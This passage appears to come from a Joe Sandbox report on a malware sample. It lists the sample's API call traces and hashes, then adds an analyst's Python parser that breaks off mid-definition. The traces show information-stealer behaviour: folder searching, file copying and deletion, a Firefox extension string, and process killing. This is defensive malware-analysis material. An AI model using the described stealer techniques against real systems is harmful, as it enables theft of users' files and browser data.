                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230D6E8
                                      • lstrlen.KERNEL32(00000000), ref: 0230D8FF
                                      • lstrlen.KERNEL32(00000000), ref: 0230D913
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230D992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,0087C4D8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D801
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D99F
                                      • lstrlenA.KERNEL32(00000000), ref: 0040D9B3
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0230DA68
                                      • lstrlen.KERNEL32(00000000), ref: 0230DC06
                                      • lstrlen.KERNEL32(00000000), ref: 0230DC1A
                                      • DeleteFileA.KERNEL32(00000000), ref: 0230DC99
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                                      • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      APIs
                                      • __scrt_initialize_crt.LIBCMT ref: 0232E562
                                        • Part of subcall function 0232E9F7: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 0232EA19
                                      • __scrt_acquire_startup_lock.LIBCMT ref: 0232E577
                                      • __scrt_release_startup_lock.LIBCMT ref: 0232E5E5
                                      • __scrt_get_show_window_mode.LIBCMT ref: 0232E638
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 1452418845-0
                                      APIs
                                      • memset.MSVCRT ref: 004194EB
                                        • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                        • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                        • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                      • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 396451647-0
                                      APIs
                                      • memset.MSVCRT ref: 02319752
                                        • Part of subcall function 02318FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02319785,00000000), ref: 02318FC2
                                        • Part of subcall function 02318FB7: RtlAllocateHeap.NTDLL(00000000), ref: 02318FC9
                                        • Part of subcall function 02318FB7: wsprintfW.USER32 ref: 02318FDF
                                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 02319812
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 02319830
                                      • CloseHandle.KERNEL32(00000000), ref: 0231983D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                      • String ID:
                                      • API String ID: 3729781310-0
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                      • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                      • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • CloseHandle.KERNEL32(?), ref: 00418761
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 02318931
                                      • Process32First.KERNEL32(?,00000128), ref: 02318945
                                      • Process32Next.KERNEL32(?,00000128), ref: 0231895A
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • CloseHandle.KERNEL32(?), ref: 023189C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                      • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                      • lstrcatA.KERNEL32(?,008783B0), ref: 00414FAB
                                      • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                      • wsprintfA.USER32 ref: 00418850
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 2716131235-2206825331
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID:
                                      • API String ID: 3407564107-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                      • wsprintfA.USER32 ref: 004179F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 1243822799-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02317C17
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317C1E
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02317C2B
                                      • wsprintfA.USER32 ref: 02317C5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02317CCA
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317CD1
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02317CE4
                                      • wsprintfA.USER32 ref: 02317D1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s
                                      • String ID:
                                      • API String ID: 3330995566-0
                                      APIs
                                      • CreateFileA.KERNEL32(02313D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02313D55,?), ref: 02319563
                                      • GetFileSizeEx.KERNEL32(000000FF,02313D55), ref: 02319580
                                      • CloseHandle.KERNEL32(000000FF), ref: 0231958E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D31
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02316D4F
                                      • CloseHandle.KERNEL32(00000000), ref: 02316D60
                                      • Sleep.KERNEL32(00001770), ref: 02316D6B
                                      • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02316D81
                                      • ExitProcess.KERNEL32 ref: 02316D89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction ID: 16da8243f64f684c233975390da9303ae2bc6f472210fbf7fe4c6a1c8e193814
                                      • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                      • Instruction Fuzzy Hash: 2DF05878980609AEEB28ABE1DC1ABBD767EEF05746F115A1AF502A5190CFB04100CE66
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: `o@
                                      • API String ID: 0-590292170
                                      • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                      • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                      • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                      APIs
                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                      • lstrcatA.KERNEL32(?,00881120), ref: 00414C08
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                        • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                        • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                        • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                        • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                        • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00882620,?,000003E8), ref: 00414A4A
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                        • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                        • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                        • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                        • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: UaA
                                      • API String ID: 2104210347-3893042857
                                      • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                      • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                      • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                      • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
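The two records above are the ones an analyst stops on when triaging this report: a named-event probe (OpenEventA with 001F0003, i.e. EVENT_ALL_ACCESS) that ends in Sleep(00001770) and ExitProcess, and the SHGetFolderPathA / FindFirstFileA / PathMatchSpecA / CopyFileA / DeleteFileA / FindNextFileA chain that is a file-grabber loop. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses records written in the report's own "APIs" listing format into ordered call lists, decodes the hex immediates, and tags each record with simple behavioural signatures. The signature names, the regular expression and the trimmed sample text embedded in it are constructed for illustration.

```python
import re

# Constructed sample input: two function records trimmed from the report's own
# "APIs" listing format (the named-event routine and the file-grabber chain).
SAMPLE = """\
APIs
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540), ref: 02316D31
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02316D4F
• CloseHandle.KERNEL32(00000000), ref: 02316D60
• Sleep.KERNEL32(00001770), ref: 02316D6B
• CloseHandle.KERNEL32(?,00000000), ref: 02316D81
• ExitProcess.KERNEL32 ref: 02316D89
• API ID: CloseEventHandle$CreateExitOpenProcessSleep
• Instruction Fuzzy Hash: 2DF05878980609AEEB28ABE1DC1ABBD767EEF05746F115A1AF502A5190CFB04100CE66
APIs
  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
• lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
  • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
  • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
  • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
  • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
  • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
  • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
• API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(args) or Api.MODULE with no argument list, then "ref: <addr>".
CALL_RE = re.compile(
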